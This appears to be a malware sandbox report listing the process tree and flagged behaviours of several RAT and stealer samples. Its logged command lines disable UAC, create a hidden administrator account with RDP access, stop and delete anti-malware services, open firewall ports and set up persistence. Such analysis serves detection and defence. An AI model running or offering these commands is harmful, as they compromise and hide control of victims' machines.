C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe"1⤵
- Adds Run key to start application
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "2⤵
-
C:\Windows\SysWOW64\PING.EXEPING 127.0.0.1 -n 23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
C:\Windows\SysWOW64\Userdata\Userdata.exe"C:\Windows\SysWOW64\Userdata\Userdata.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"4⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Blackkomet.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Blackkomet.exe"1⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Blackkomet.exe" +s +h2⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT" +s +h2⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\Windupdt\winupdate.exe"C:\Windows\system32\Windupdt\winupdate.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\notepad.exenotepad3⤵
- Adds Run key to start application
- Drops file in System32 directory
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt" +s +h3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\Windupdt\winupdate.exe"C:\Windows\system32\Windupdt\winupdate.exe"3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\notepad.exenotepad4⤵
- Adds Run key to start application
- Drops file in System32 directory
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h4⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt" +s +h4⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\Windupdt\winupdate.exe"C:\Windows\system32\Windupdt\winupdate.exe"4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h5⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt" +s +h5⤵
- Sets file to hidden
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
C:\Windows\SysWOW64\Windupdt\winupdate.exe"C:\Windows\system32\Windupdt\winupdate.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\notepad.exenotepad6⤵
- Adds Run key to start application
- Drops file in System32 directory
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h6⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt" +s +h6⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\notepad.exeC:\Windows\SysWOW64\notepad.exe6⤵
-
C:\Windows\SysWOW64\notepad.exeC:\Windows\SysWOW64\notepad.exe4⤵
-
C:\Windows\SysWOW64\notepad.exeC:\Windows\SysWOW64\notepad.exe3⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"1⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004DC1⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
- Launches sc.exe
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
- Modifies registry class
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
- System Location Discovery: System Language Discovery
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
- Remote Service Session Hijacking: RDP Hijacking
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Executes dropped EXE
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1234⤵
- Executes dropped EXE
-
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\218B.tmp\218C.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list7⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 14⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer2⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer2⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer2⤵
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_642⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_643⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
